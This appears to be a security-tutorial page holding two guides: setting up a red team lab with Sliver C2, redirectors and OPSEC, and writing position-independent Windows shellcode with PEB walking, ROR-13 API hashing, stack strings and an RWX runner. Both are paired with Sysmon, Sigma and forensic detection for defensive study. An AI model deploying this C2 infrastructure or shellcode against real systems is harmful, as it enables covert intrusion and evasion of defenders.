  • Detect adversaries profiling you with correlated recon signals — Sysmon Event IDs 1/3/22, honeytokens, and Cert Transparency monitoring — and profile for the top of the Pyramid of Pain, where changing TTPs costs the adversary the most.

Related Tutorials

References

Building a Red Team Lab: Infrastructure, VMs, and C2 Setup

Objective: Understand how to design, build, and operate a self-contained red team lab — hypervisor and VM selection, network segmentation, C2 framework deployment, redirector architecture, and OPSEC discipline — so authorized operators get a reproducible practice environment and defenders learn what adversary infrastructure looks like from the inside.


1. Lab Philosophy and Legal Guardrails

A red team lab exists for one reason: to test tradecraft against telemetry without touching production. Everything in this tutorial is for authorized testing inside an isolated environment you own. Never point lab C2 at systems outside your scope.

A dedicated lab gives you two things production cannot. First, repeatability — snapshot, detonate, revert, repeat. Second, observability — you run the blue stack and the red stack side by side and watch every event a real implant generates.

Two build models exist:

  • Air-gapped lab — host-only virtual networks with no internet. Safest for malware detonation and EDR-bypass study.
  • Cloud-backed lab — VPS-hosted team servers and redirectors for testing real callbacks, domain categorization, and redirector chains.

Most learners start air-gapped and graduate to a hybrid with a single controlled egress gateway.


2. Hardware and Hypervisor Selection

A workable lab runs on a single workstation. The constraint is RAM, because a Domain Controller, a Windows endpoint, a Linux target, and a SIEM run concurrently.

ComponentRecommendation
Host RAM16 GB minimum, 32 GB+ for full AD + SIEM
Storage100 GB SSD minimum, 256 GB+ for multi-VM snapshots
CPUQuad-core with virtualization extensions (VT-x/AMD-V)

Choose a Type-2 hypervisor:

FeatureVMware Workstation ProVirtualBox
Nested virtualizationReliableLimited
Advanced networkingLAN SegmentsInternal Network
Snapshot fidelityHighAdequate
CostCommercialFree

VMware Workstation Pro / Fusion is preferred for nested virtualization and snapshot fidelity; VirtualBox is the free alternative with less reliable advanced networking.

Snapshot discipline is non-negotiable. Snapshot before each phase — a clean pre-exploitation baseline, a post-compromise state, a post-persistence state — so you can replay a scenario without rebuilding.


3. Network Architecture Design

Segment the lab into tiers so the attacker subnet, target subnet, and monitoring subnet cannot freely route to one another. This mirrors real network boundaries and forces realistic lateral movement.

Networking ModeBehaviorLab Use
Host-OnlyIsolated subnet, no internetDefault for all tiers
NATVMs share the host IP outboundControlled egress only
LAN Segment / InternalInter-VM only, no hostTarget-to-target traffic
BridgedVM joins physical LANAvoid (leaks to real network)

Build three host-only segments: attacker, target, monitoring. A dedicated “egress” VM with dual NICs (one host-only, one NAT) acts as the only controlled gateway when you must test real C2 callbacks. The monitoring tier should receive logs one-way and remain unreachable from the attacker subnet.


Diagram showing three isolated host-only network tiers — attacker, target, and monitoring — connected through a dual-NIC egress VM acting as the sole gateway to the internet
Three-tier segmentation forces realistic lateral movement and keeps the monitoring subnet unreachable from the attacker tier.

4. Building the Target Network

The target network simulates a small enterprise: a Domain Controller, a domain-joined Windows endpoint, and a Linux host.

VM RoleOSPurpose
Domain ControllerWindows Server 2019/2022AD DS, DNS, DHCP
Windows TargetWindows 10/11 (domain-joined)Implant testing
Linux TargetUbuntu / CentOSCross-platform implants

Promote the DC with AD DS, configure DNS, then join endpoints to the domain. The following script joins a Windows target, points DNS at the DC, and enables WinRM for management.

# Domain join + WinRM enablement for a lab Windows target
$DC = "192.168.56.10"     # Domain Controller IP
$Domain = "lab.local"

# Point DNS at the DC so domain resolution works
Set-DnsClientServerAddress -InterfaceAlias "Ethernet0" -ServerAddresses $DC

# Enable remote management for lab orchestration
Enable-PSRemoting -Force
Set-Item WSMan:\localhost\Client\TrustedHosts -Value $DC -Force

# Join the domain (prompts for credentials, then reboot)
Add-Computer -DomainName $Domain -Restart

5. Deploying the Blue Team Monitoring Stack

The monitoring tier is what turns a playground into a detection lab. Deploy Wazuh or Security Onion as the SIEM/IDS, then instrument every Windows VM with Sysmon using a community config such as SwiftOnSecurity or Olaf Hartong’s sysmon-modular.

VM RoleOSPurpose
Blue Team / SIEMSecurity Onion / WazuhLog aggregation, IDS, alerting

Forward all Windows and Sysmon channels to the SIEM, enable real-time alerting, and leave Windows Defender enabled on targets so you can observe EDR behavior against your implants. Add Zeek for network metadata — its conn.log is invaluable for spotting beaconing.


6. C2 Framework Selection and Trade-offs

A C2 framework is the infrastructure used to control compromised systems remotely. It has three parts: a C2 server (backend), a C2 client (operator interface), and a C2 agent / implant (payload on the target).

FrameworkLicenseNotes
SliverOpen-source (Bishop Fox)mTLS, HTTP/S, DNS, WireGuard transports; go-to Cobalt Strike alternative
HavocOpen-sourceReal-time client UI via API; Cobalt-Strike-like feel
MythicOpen-sourceDocker-based, web UI, pluggable C2 profiles and agents
MetasploitOpen-sourcemsfconsole, multi/handler; good for catching payloads, weak for long-haul
Cobalt StrikeCommercial (~$3,540/user/yr)Malleable C2, Beacon, Aggressor Script; awareness only

Core architecture primitives apply across all of them:

TermDefinition
Team ServerPersistent backend; never directly internet-facing
Implant / Beacon / AgentPayload on the target that calls back
RedirectorDisposable proxy in front of the team server; assumed to be burned
ListenerServer-side handler waiting for callbacks (e.g., HTTPS/443)
Malleable ProfileConfig shaping HTTP/S traffic to mimic legitimate requests
Sleep / JitterCallback interval plus randomness; breaks beacon regularity

This tutorial uses Sliver as the primary example because it is free, modern, and well-documented at sliver.sh/docs.


7. Deploying Sliver C2

Install the server on a dedicated Ubuntu 22.04 host on the attacker tier. The team server should never be exposed directly — a redirector sits in front of it (Section 8).

# Install Sliver server (run on the dedicated C2 VM)
curl https://sliver.sh/install | sudo bash

# Run as a service so it survives reboots
sudo systemctl enable --now sliver

# Drop into the server console
sliver-server

Inside the console, start an HTTPS listener and generate a Windows x64 beacon. --skip-symbols speeds up builds in a lab; flags change between releases, so verify against the official docs.

# Start an HTTPS listener bound to the redirector-facing interface
https --lhost 192.168.56.20 --lport 443

# Generate a Windows x64 HTTPS beacon
generate beacon --http 192.168.56.20 --os windows --arch amd64 --skip-symbols

# After the implant calls back:
sessions                 # list active sessions
use <session_id>         # interact with a session

The HTTP/S transport is shaped via /root/.sliver/configs/http-c2.json, which controls URIs, headers, and polling behavior. The default mTLS transport listens on 8888.


8. Redirector Architecture

A redirector is a disposable proxy that fronts the team server. Implants talk only to the redirector; if blue team burns its IP, you rebuild it and the long-term server stays hidden.

Implant → Redirector (Nginx/Apache/socat) → C2 Team Server

The redirector filters traffic: requests matching your implant’s expected path and user-agent are forwarded to the team server; everything else is dropped or returned as a benign error or redirected to a legitimate site.

# Nginx redirector: forward only matching C2 traffic, 404 everything else
server {
    listen 443 ssl;
    server_name cdn.example-lab.local;

    location /api/v2/updates {
        # Only forward requests carrying the expected implant User-Agent
        if ($http_user_agent != "Mozilla/5.0 (Windows NT 10.0; Win64; x64)") {
            return 404;
        }
        proxy_pass https://192.168.56.30:443;   # team server (internal)
        proxy_ssl_verify off;
    }

    # Anything else gets a flat 404 — no team server exposure
    location / {
        return 404;
    }
}

For HTTPS redirectors use Apache, Nginx, or Caddy; for DNS redirectors use socat or iptables. In advanced cloud setups, CDN fronting via CloudFront, Azure CDN, or Cloudflare blends C2 with legitimate traffic. Do not deploy domain-fronting or malleable-profile code from a tutorial — reference framework docs.


Flow diagram showing an implant beaconing to a disposable redirector that filters traffic by path and user-agent, forwarding matched requests to the hidden team server and dropping or redirecting unmatched traffic to a decoy site
Redirectors act as disposable proxies so burning an IP never exposes the long-lived team server.

9. OPSEC and Infrastructure Hygiene

Your infrastructure is your OPSEC. A flat setup is a single point of failure that burns the whole operation.

  • Never connect the operator machine directly to the team server. Tunnel through a VPN overlay (WireGuard, Tailscale/Headscale) or a jump box.
  • Separate infrastructure for phishing, payload hosting, and C2 — three servers, three redirectors.
  • Use aged, categorized domains registered 30+ days prior with a benign-looking category.
  • Rotate redirector IPs and never reuse burned infrastructure.
  • Geofence access via Cloudflare so only the client’s country can reach C2 and campaign domains, blocking external threat-intel scanners.

A minimal operator WireGuard client routes only team-server traffic through the jump box:

# wg0.conf — operator client tunneling to the jump box
[Interface]
PrivateKey = <operator_private_key>
Address    = 10.10.10.2/32

[Peer]
PublicKey  = <jumpbox_public_key>
Endpoint   = jump.example-lab.local:51820
AllowedIPs = 10.10.10.0/24      # only the team-server subnet
PersistentKeepalive = 25

Relevant transports and ports:

ProtocolPortC2 Use
HTTPS443Primary beacon transport
HTTP80Fallback / staging
DNS53Low-and-slow tunneling
SMB Named PipeIPC$Lateral movement pivots
WireGuard51820Operator VPN overlay
mTLS8888Sliver default implant transport

Graph diagram showing an operator machine routing through a WireGuard jump box to three separate infrastructure components — C2 server, phishing server, and payload hosting — each isolated from one another
Separating C2, phishing, and payload infrastructure ensures a single burned server cannot compromise the entire operation.

10. Infrastructure-as-Code with Terraform

Terraform declares lab state in configuration, so a burned redirector is rebuilt in minutes. The example provisions a team server and a redirector, then bootstraps the server with remote-exec.

resource "digitalocean_droplet" "c2_server" {
  name   = "c2-teamserver"
  region = "nyc3"
  size   = "s-2vcpu-4gb"
  image  = "ubuntu-22-04-x64"

  provisioner "remote-exec" {
    inline = ["curl https://sliver.sh/install | sudo bash"]
  }
}

resource "digitalocean_droplet" "redirector" {
  name   = "c2-redirector"
  region = "nyc3"
  size   = "s-1vcpu-1gb"
  image  = "ubuntu-22-04-x64"
}

output "c2_ip"        { value = digitalocean_droplet.c2_server.ipv4_address }
output "redirector_ip"{ value = digitalocean_droplet.redirector.ipv4_address }

terraform apply builds the stack and emits IPs; terraform destroy tears it down. Teardown-and-rebuild cycles keep infrastructure disposable.


11. Common Attacker Techniques

These are the primitives a lab is built to study and detect.

TechniqueDescription
HTTPS beaconingImplant polls a redirector over 443 to blend with web traffic
DNS tunnelingEncodes C2 in DNS queries for low-and-slow egress
Redirector chainingDisposable proxies hide the long-term team server
Domain frontingCDN obfuscation routes C2 through trusted domains
Malleable profilesShape headers/URIs/jitter to mimic legitimate apps
SMB named-pipe C2Internal pivots over IPC$ for lateral movement
Ingress tool transferImplant downloads additional tooling to the target

12. Defensive Strategies and Detection

Run the same lab as blue team to build detections. Sysmon plus a tuned config surfaces nearly every C2 stage.

Event IDNameC2 Relevance
1Process CreationImplant execution; check ParentImage, CommandLine, Hashes
3Network ConnectionConnections to C2; DestinationIp, DestinationPort, Image
7Image LoadedDLL loads by implant; Signed, Signature
8CreateRemoteThreadInjection; SourceImageTargetImage
11FileCreateStager writes payload to disk
22DNSEventBeaconing via unusual or excessive QueryName
23FileDeleteImplant self-deletes after staging

Tune Sysmon to capture outbound connections from non-browser processes and DNS queries from shells:

<RuleGroup name="C2 Network" groupRelation="or">
  <NetworkConnect onmatch="include">
    <DestinationPort condition="is">443</DestinationPort>
    <DestinationPort condition="is">53</DestinationPort>
  </NetworkConnect>
  <DnsQuery onmatch="include">
    <Image condition="end with">powershell.exe</Image>
    <Image condition="end with">cmd.exe</Image>
  </DnsQuery>
</RuleGroup>

A Sigma rule for beacon-like connections keys on Sysmon EventID 3, common C2 ports, and an allowlist of browsers. Correlate hits with short, regular intervals to catch low-jitter beacons.

title: Non-Browser Outbound to Common C2 Ports
logsource:
  product: windows
  service: sysmon
  category: network_connection
detection:
  selection:
    EventID: 3
    DestinationPort:
      - 443
      - 80
      - 53
    Initiated: 'true'
  filter_browsers:
    Image|contains:
      - '\chrome.exe'
      - '\firefox.exe'
      - '\msedge.exe'
  condition: selection and not filter_browsers
fields:
  - Image
  - DestinationIp
  - DestinationPort
  - DestinationHostname
level: high

Layer behavioral analytics on top:

  • Jitter analysis — alert on outbound HTTPS at regular intervals (e.g., 60 ± 5 s); Zeek conn.log excels at long-duration, low-byte sessions.
  • Named-pipe anomalies — Cobalt Strike’s default msagent_* pipe names appear in Sysmon EID 17/18.
  • Anomalous parent-child chainsWord.exe → cmd.exe → powershell.exe is a classic phishing chain.
  • User-agent mismatchsvchost.exe issuing a Chrome user-agent is anomalous.

Enable Command Line Auditing via GPO (Audit Process Creation → include command line, EID 4688) and forward Microsoft-Windows-PowerShell/Operational (EID 4104) script-block logs to the SIEM. Keep the monitoring tier one-way and unreachable from the attacker subnet.

MITRE ATT&CK Mapping

TechniqueMITRE IDDetection
Command and Control (tactic)TA0011Beacon traffic correlation across SIEM
Application Layer ProtocolT1071Sysmon EID 3, Zeek conn.log
Web ProtocolsT1071.001Non-browser HTTPS to rare destinations
DNST1071.004Sysmon EID 22, DNS-Client ETW
Proxy / External ProxyT1090 / T1090.002Redirector IP reputation, JA3 anomalies
Domain FrontingT1090.004TLS SNI vs. Host header mismatch
Protocol TunnelingT1572mTLS/DoH volume anomalies
Ingress Tool TransferT1105Sysmon EID 11, download-and-exec
Acquire Infrastructure: VPS / DomainsT1583.003 / T1583.001Newly registered / uncategorized domains
Remote Access SoftwareT1219RMM tools acting as C2

13. Tools for Red Team Lab Analysis

ToolDescriptionLink
SliverOpen-source C2 server, client, implantssliver.sh
WazuhSIEM + EDR agent for the blue tierwazuh.com
Security OnionIDS + log management distrosecurityonionsolutions.com
SysmonEndpoint telemetry (process/network/DNS)microsoft.com
ZeekNetwork metadata and beacon huntingzeek.org
TerraformInfrastructure-as-code provisioningterraform.io
WireGuardOperator VPN overlaywireguard.com
NginxRedirector reverse proxynginx.org

Summary

  • A red team lab is a closed, segmented environment where authorized operators rehearse C2 tradecraft while the blue stack records every event it generates.
  • Tiered host-only networks, snapshot discipline, and a Type-2 hypervisor make scenarios isolated and repeatable.
  • A team server must never be internet-facing; disposable redirectors front it and are rebuilt with infrastructure-as-code when burned.
  • OPSEC is architecture — operator VPN overlays, separated phishing/C2/payload infrastructure, aged domains, and rotated IPs keep operations deniable.
  • Detect C2 with Sysmon EID 3/22, jitter and named-pipe analysis, and Sigma rules, mapping every primitive back to MITRE TA0011.

Related Tutorials

References

Position-Independent Code: Writing PIC Shellcode Without Hardcoded Addresses

Objective: Understand how Windows shellcode achieves position independence — resolving module bases through the TEB/PEB chain, walking PE export tables, hashing API names, and eliminating null bytes — so defenders can detect the resulting memory and behavioral signatures and authorized red teamers can build and test payloads correctly.


1. What Makes Code Position-Dependent?

A normal Windows executable contains absolute virtual addresses everywhere: indirect calls through the Import Address Table (IAT), references to global variables, jump tables, and so on. The PE loader fixes these up at load time using the .reloc section and patches the IAT against the modules it has just mapped.

Shellcode has none of that. It is raw opcodes copied into a memory region (often allocated by VirtualAlloc or written into another process), with no loader, no relocation table, no IAT, and no guarantee about where it will live. Any hardcoded virtual address — to a string, to an API, to a jump target — will be wrong the moment the payload moves.

The constraint is therefore strict: every address the shellcode needs must be computed at runtime, from a known starting point that the OS itself hands the thread. On Windows, that starting point is the Thread Environment Block (TEB).


2. The Problem with the IAT

A standard PE binary calls LoadLibraryA via something like call qword ptr [rip+IAT_LoadLibraryA] — an indirect jump through a slot the loader populated. Shellcode cannot do this:

  • It has no .idata section, no IMAGE_IMPORT_DESCRIPTOR, and no loader to read them.
  • It cannot embed an absolute kernel32!LoadLibraryA address because ASLR randomizes module bases every boot.
  • It cannot rely on Windows syscall numbers either — those numbers are not a stable ABI and shift between builds.

The standard solution is PEB walking: the shellcode traces the in-memory loader data structures to find kernel32.dll, parses its export table, and resolves the handful of APIs it actually needs (typically LoadLibraryA and GetProcAddress, which then bootstrap anything else).


3. Windows Memory Layout Primer: TEB, PEB, and the Loader

Every Windows thread has a TEB. The OS keeps a pointer to it in a segment register so user-mode code can reach it in a single instruction:

ArchitectureInstructionResult
x86MOV EAX, FS:[0x30]EAXTEB.ProcessEnvironmentBlock (PEB)
x64MOV RAX, GS:[0x60]RAXTEB.ProcessEnvironmentBlock (PEB)

From the PEB, shellcode chains through Ldr (a _PEB_LDR_DATA*) to reach the loader’s three doubly-linked lists of _LDR_DATA_TABLE_ENTRY records — one entry per loaded module.

Relevant offsets (Windows 10/11):

StructFieldx86 offsetx64 offset
_TEBProcessEnvironmentBlock+0x030+0x060
_PEBLdr+0x00C+0x018
_PEB_LDR_DATAInLoadOrderModuleList+0x00C+0x010
_PEB_LDR_DATAInMemoryOrderModuleList+0x014+0x020
_PEB_LDR_DATAInInitializationOrderModuleList+0x01C+0x030
_LDR_DATA_TABLE_ENTRYDllBase+0x018+0x030
_LDR_DATA_TABLE_ENTRYBaseDllName+0x02C+0x058

Verify offsets on your target build with WinDbg (dt ntdll!_PEB, dt ntdll!_LDR_DATA_TABLE_ENTRY). They are stable across mainstream Windows 10/11 but not guaranteed forever.

// Conceptual layout — fields used by PEB-walking shellcode
typedef struct _LDR_DATA_TABLE_ENTRY {
    LIST_ENTRY     InLoadOrderLinks;        // +0x00
    LIST_ENTRY     InMemoryOrderLinks;      // +0x10 (x64)
    LIST_ENTRY     InInitializationOrderLinks;
    PVOID          DllBase;                 // +0x30 (x64)
    PVOID          EntryPoint;
    ULONG          SizeOfImage;
    UNICODE_STRING FullDllName;
    UNICODE_STRING BaseDllName;             // +0x58 (x64)
    // ...
} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;

Flowchart showing the shellcode pointer chain from TEB via PEB and PEB_LDR_DATA to the kernel32.dll DllBase field
Every PIC shellcode begins here: a single segment-register read unravels the full loader chain to kernel32’s image base.

4. Walking the Module List to Find kernel32.dll

The loader populates InInitializationOrderModuleList in a predictable order: the main executable first, then ntdll.dll, then kernel32.dll. A common shortcut is to grab the third entry’s DllBase without ever comparing a name — fewer bytes, no strings, no signatures.

; x64 — locate kernel32.dll base via the PEB
; Output: RBX = kernel32.dll base address

    xor   rcx, rcx
    mov   rax, [gs:rcx + 0x60]      ; RAX = PEB
    mov   rax, [rax + 0x18]         ; RAX = PEB->Ldr
    mov   rax, [rax + 0x20]         ; RAX = InMemoryOrderModuleList.Flink (1st: this EXE)
    mov   rax, [rax]                ; 2nd entry: ntdll.dll
    mov   rax, [rax]                ; 3rd entry: kernel32.dll
    mov   rbx, [rax + 0x20]         ; LDR_DATA_TABLE_ENTRY.DllBase
                                    ; (offset 0x20 within an InMemoryOrder-rooted entry)

For 32-bit shellcode the same idea applies with smaller offsets:

; x86 — same walk, FS-relative
    xor   ecx, ecx
    mov   eax, [fs:ecx + 0x30]      ; EAX = PEB
    mov   eax, [eax + 0x0C]         ; PEB->Ldr
    mov   eax, [eax + 0x14]         ; InMemoryOrderModuleList.Flink
    mov   eax, [eax]                ; 2nd
    mov   eax, [eax]                ; 3rd (kernel32)
    mov   ebx, [eax + 0x10]         ; DllBase (x86 offset)

A more robust variant iterates the list and hash-compares BaseDllName.Buffer (Unicode), upper-casing each character inline. That survives reordering and is what production loaders use.


5. Parsing the PE Export Directory

Once RBX = kernel32!ImageBase, the shellcode parses the PE headers:

ImageBase
  └─► IMAGE_DOS_HEADER.e_lfanew (+0x3C)
        └─► IMAGE_NT_HEADERS
              └─► OptionalHeader.DataDirectory[0]  ; EXPORT
                    └─► IMAGE_EXPORT_DIRECTORY
                          ├─ NumberOfNames
                          ├─ AddressOfNames        (RVA → name RVAs)
                          ├─ AddressOfNameOrdinals (RVA → ordinal table)
                          └─ AddressOfFunctions    (RVA → function RVAs)

The three arrays are parallel: index i in AddressOfNames matches index i in AddressOfNameOrdinals, whose ordinal value o indexes AddressOfFunctions[o]. All values are RVAs, so the resolved function address is ImageBase + RVA.

; x64 — reach the export directory from RBX = ImageBase
; Output: RCX = IMAGE_EXPORT_DIRECTORY*
    mov   eax, dword [rbx + 0x3C]   ; DOS.e_lfanew
    lea   rdx, [rbx + rax]          ; RDX -> IMAGE_NT_HEADERS
    mov   eax, dword [rdx + 0x88]   ; NT.OptionalHeader.DataDirectory[0].VirtualAddress
    lea   rcx, [rbx + rax]          ; RCX -> IMAGE_EXPORT_DIRECTORY

    mov   r8d,  dword [rcx + 0x18]  ; NumberOfNames
    mov   r9d,  dword [rcx + 0x20]  ; AddressOfNames     (RVA)
    mov   r10d, dword [rcx + 0x24]  ; AddressOfNameOrdinals
    mov   r11d, dword [rcx + 0x1C]  ; AddressOfFunctions

The resolver then iterates 0..NumberOfNames-1, hashes the name string at ImageBase + Names[i], compares against a precomputed target, and on match returns ImageBase + Functions[ Ordinals[i] ].


Flowchart illustrating the three parallel export table arrays — AddressOfNames, AddressOfNameOrdinals, AddressOfFunctions — and how they combine to resolve a Windows API address at runtime
The export directory’s three parallel arrays form a two-step indirection: name index maps to ordinal, ordinal maps to function RVA.

6. Function Name Hashing (ROR-13)

Embedding the literal string "LoadLibraryA" would (a) introduce hardcoded data references and (b) be a trivial AV signature. The standard substitute is an inline rolling hash. The most common is ROR-13 add:

// Conceptual ROR-13 hash. Iterate bytes of the export name; stop at NUL.
// Same routine is implemented inline in assembly when resolving APIs.
unsigned int ror13_hash(const char *name) {
    unsigned int h = 0;
    while (*name) {
        h = (h >> 13) | (h << (32 - 13));   // ROR 13
        h += (unsigned char)*name++;
    }
    return h;
}

// Pre-computed constants (illustrative — recompute for your toolchain):
// LoadLibraryA   -> 0x0726774C
// GetProcAddress -> 0x7C0DFCAA
// ExitProcess    -> 0x73E2D87E
// VirtualAlloc   -> 0x91AFCA54

Replacing the while body with three cmp/ror/add instructions inside the export-walk loop produces a few dozen bytes of fully position-independent resolver — no strings, no absolute addresses, no relocations.


7. RIP-Relative Addressing and the CALL/POP Trick

When the shellcode does need inline data (a precomputed key, a config blob, a wide-string template), it must reference it without an absolute address.

x64 makes this nearly free: every LEA reg, [rel label] and direct CALL/JMP is encoded RIP-relative:

    lea   rcx, [rel api_hash_table]   ; RIP-relative, no relocation needed

x86 has no RIP-relative encoding. The classic substitute is the get-EIP trick: CALL past a label, then POP the return address into a register, giving you a known anchor:

    call  get_eip
get_eip:
    pop   ebp                          ; EBP = address of this instruction
    ; data referenced as [ebp + (label - get_eip)]

Anything stored inline can now be addressed by displacement from EBP.


8. Stack Strings and Null-Byte Elimination

Shellcode is often delivered via a string-copying primitive (strcpy, lstrcpyA, a parser that stops at \0), so embedded null bytes truncate the payload. Two problems must be solved together: avoid nulls in opcodes, and produce required strings ("kernel32.dll", "WinExec", "cmd.exe") without storing them as data.

Construct strings on the stack by pushing immediates:

; Build "cmd.exe\0" on the stack (8 bytes including NUL)
    xor   rax, rax
    push  rax                       ; trailing NUL via zeroed qword
    mov   rax, 0x6578652E646D63     ; 'cmd.exe' (little-endian, no embedded zero)
    push  rax
    mov   rcx, rsp                  ; RCX -> "cmd.exe\0" — first arg for WinExec

Eliminate accidental nulls in opcodes:

AvoidUse insteadReason
mov rax, 0 (48 C7 C0 00 00 00 00)xor rax, raxRemoves four NUL bytes
push 0 (6A 00)xor reg, reg; push reg6A 00 contains a NUL
Short jumps spanning NUL displacementsPad with nop or reorder codeAvoids NUL in the offset byte
mov al, 0x00xor al, alSame fix at byte width

Always disassemble and grep the assembled output for \x00 before shipping — see Section 10.


9. x64 ABI Constraints: Shadow Space and Alignment

Windows x64 imposes two rules shellcode authors get wrong constantly:

  1. RSP must be 16-byte aligned at the point of CALL to any Windows API. The CALL itself pushes an 8-byte return address, so the callee’s RSP ends up at (16N - 8) on entry, which is what Microsoft’s prolog code expects.
  2. The caller allocates 32 bytes of shadow space (a.k.a. home space) above the return address, even when the callee takes 0–4 arguments. The callee may spill RCX, RDX, R8, R9 into those slots.

The first four integer arguments go in RCX, RDX, R8, R9; further arguments are pushed right-to-left. Volatile registers (RAX, RCX, RDX, R8R11) may be clobbered by any CALL; non-volatile (RBX, RBP, RDI, RSI, R12R15) must be saved if you rely on them.

; Calling WinExec("cmd.exe", SW_HIDE) once API is resolved in RAX
    and   rsp, -16                  ; force 16-byte alignment
    sub   rsp, 32                   ; shadow space (home space)

    lea   rcx, [rsp + 0x40]         ; pointer to "cmd.exe" (built earlier)
    xor   rdx, rdx                  ; uCmdShow = SW_HIDE (0)
    call  rax                       ; WinExec

    add   rsp, 32                   ; tear down shadow space

Misalignment typically manifests as STATUS_ACCESS_VIOLATION inside kernel32 or ntdll MMX/SSE prologs — a tell-tale crash signature when reviewing payloads.


10. Extraction and Controlled Testing

Once assembled with NASM, raw bytes are extracted from the COFF object and audited:

nasm -f win64 payload.asm -o payload.obj
objcopy -O binary -j .text payload.obj payload.bin

A quick Python harness verifies the payload is truly position-independent — no embedded nulls, no relocations:

# verify.py — sanity-check a raw shellcode blob
data = open("payload.bin", "rb").read()
print(f"[+] size: {len(data)} bytes")

null_offsets = [i for i, b in enumerate(data) if b == 0]
if null_offsets:
    print(f"[!] {len(null_offsets)} NUL byte(s), first at offset {null_offsets[0]:#x}")
else:
    print("[+] null-free")

# C-array dump for embedding in a test loader
print("unsigned char sc[] = {")
print(", ".join(f"0x{b:02x}" for b in data))
print("};")

A minimal local loader executes the payload inside the same process for isolated VM testing — this is the educational sandbox, not a cross-process injector:

// test_runner.cpp — local-only execution for analysis in a VM
// Defenders: this RWX + function-pointer-cast pattern is exactly what
// EDR/ETW THREATINT flags. It is shown so you know what to look for.
#include <windows.h>
#include <string.h>
extern unsigned char sc[];
extern size_t        sc_len;

int main(void) {
    void *mem = VirtualAlloc(NULL, sc_len,
                             MEM_COMMIT | MEM_RESERVE,
                             PAGE_EXECUTE_READWRITE);
    memcpy(mem, sc, sc_len);
    ((void(*)())mem)();
    return 0;
}

The VirtualAlloc(PAGE_EXECUTE_READWRITE)memcpy → indirect-call triad is the canonical shellcode runner pattern and is heavily instrumented.


11. Common Attacker Techniques

TechniqueDescription
PEB walkingResolve kernel32/ntdll bases via GS:[0x60] / FS:[0x30] without imports
Export hash resolutionROR-13 (or FNV/djb2) hashing to find APIs without embedded strings
Stack stringsPush immediates to materialise "cmd.exe", "WinExec", etc., on the stack
Reflective loadingPIC stub maps a full DLL into memory and calls its DllMain (T1620)
Remote injectionVirtualAllocEx + WriteProcessMemory + CreateRemoteThread into a target PID
APC queuingQueueUserAPC to deliver shellcode into an alertable thread
Process hollowingSuspend a benign process, unmap its image, write PIC payload, resume
Module stompingOverwrite the .text of a legitimately loaded DLL with PIC shellcode

12. Defensive Strategies & Detection

PIC shellcode leaves consistent telemetry across Sysmon, ETW, and memory forensics.

Sysmon Event IDs to monitor:

Event IDSignal
1Process creation (with command line) — anomalous parents (winword.execmd.exe)
7ImageLoad from user-writable paths into system processes
8CreateRemoteThread — primary remote-injection signal
10ProcessAccess with GrantedAccess containing 0x1F0FFF, 0x1410, or PROCESS_VM_WRITE \| PROCESS_VM_OPERATION \| PROCESS_CREATE_THREAD
17/18Named pipe creation/connection (common C2 channel)
25ProcessTampering (image hollowing)

ETW providers give earlier and harder-to-evade signal: Microsoft-Windows-Threat-Intelligence (THREATINT) fires on VirtualAllocEx with PAGE_EXECUTE_READWRITE, WriteProcessMemory, and MapViewOfFile against remote processes. Consuming THREATINT requires a signed ELAM/PPL driver, which is why EDR vendors — not generic SIEMs — own this telemetry. Also enable the Audit Process Creation policy (Event ID 4688) with command-line inclusion, and Audit Kernel Object to capture OpenProcess handle requests.

Sigma sketch — cross-process handle access for injection:

title: Suspicious Cross-Process Access Likely Preceding Shellcode Injection
logsource:
  product: windows
  service: sysmon
detection:
  selection:
    EventID: 10
    GrantedAccess|contains:
      - '0x1F0FFF'    # PROCESS_ALL_ACCESS
      - '0x1410'      # VM_READ|VM_WRITE|VM_OPERATION
      - '0x1F1FFF'
    TargetImage|endswith:
      - '\lsass.exe'
      - '\svchost.exe'
      - '\explorer.exe'
  filter_legit:
    SourceImage|endswith:
      - '\MsMpEng.exe'
      - '\MsSense.exe'
  condition: selection and not filter_legit
level: high

Memory-forensics indicators: Volatility 3 malfind locates RWX regions containing executable code or PE headers in non-image memory; ldrmodules flags executable regions not represented in any of the three PEB loader lists — the canonical reflective/PIC signature. Threads whose StartAddress falls inside a heap allocation rather than a mapped image are inherently suspicious.

Hardening:

MitigationEffect
ACG (ProcessDynamicCodePolicy)Forbids new executable pages; breaks VirtualAlloc(PAGE_EXECUTE_READWRITE)
DEP / NXHardware-enforced non-execute on data pages
CFGInvalidates indirect calls to non-registered targets
HVCIHypervisor-enforced kernel code integrity
ASR rulesBlock office/script children, untrusted USB execution, etc.
Restrict SeDebugPrivilegeLimits which accounts can open and write to other processes

Hierarchy diagram showing four defensive detection layers against PIC shellcode: ETW THREATINT telemetry, Sysmon event IDs, Volatility memory forensics, and OS hardening mitigations
Layered detection combines kernel-level ETW telemetry, Sysmon behavioral events, and offline memory analysis to catch shellcode across its full lifecycle.

13. Tools for PIC Shellcode Analysis

ToolDescriptionLink
WinDbgVerify struct offsets (dt ntdll!_PEB, dt ntdll!_LDR_DATA_TABLE_ENTRY)microsoft.com
NASMAssemble x86/x64 PIC payloads in Intel syntaxnasm.us
x64dbgDynamic analysis of shellcode in a loader harnessx64dbg.com
Ghidra / IDAStatic disassembly of extracted opcodesghidra-sre.org
Process HackerInspect process memory regions and protectionsprocesshacker.sf.io
pe-sieveHunts injected, hollowed, or stomped modulesgithub.com/hasherezade/pe-sieve
Volatility 3malfind, ldrmodules, vadinfo for memory-resident PICvolatilityfoundation.org
YARASignature ROR-13 loops, PEB-walk prologues, hash tablesvirustotal.github.io/yara
SilkETWSubscribe to THREATINT and Kernel-Process providersgithub.com/mandiant/SilkETW

14. MITRE ATT&CK Mapping

TechniqueMITRE IDDetection
Reflective Code LoadingT1620Volatility malfind / ldrmodules; THREATINT ETW
Process Injection (parent)T1055Sysmon EID 10 + EID 8; ETW THREATINT WriteVM/AllocVM
Process Injection: DLLT1055.001Sysmon EID 7 from unusual paths; pe-sieve
Process Injection: APCT1055.004Kernel-Process ETW thread events on alertable waits
Process Injection: HollowingT1055.012Sysmon EID 25 ProcessTampering; pe-sieve hollowing scan
Obfuscated Files or InformationT1027YARA on ROR-13 hash loops and stack-string push sequences
Command and Scripting InterpreterT1059EID 4688 / Sysmon EID 1 with command-line auditing

Summary

  • Position-independent shellcode replaces the PE loader’s work at runtime: it must resolve every address it touches, starting from the segment-register pointer to the TEB.
  • The PEB → LdrInMemoryOrderModuleList chain reaches kernel32.dll in three pointer dereferences without any string comparison.
  • Parsing the PE export directory with ROR-13 hashed lookups removes embedded API name strings and the static signatures they create.
